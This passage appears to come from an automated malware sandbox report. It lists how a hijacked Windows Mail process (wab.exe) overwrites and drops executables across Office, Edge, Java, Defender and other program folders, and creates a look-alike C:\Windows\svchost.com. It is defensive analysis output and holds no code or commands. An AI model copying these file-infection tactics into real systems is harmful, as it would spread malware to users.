Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exe Jump to behavior
Drops PE files
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Windows\svchost.com Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Local\Temp\chrome.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\Uninstall.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\Au3Info.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe Jump to dropped file
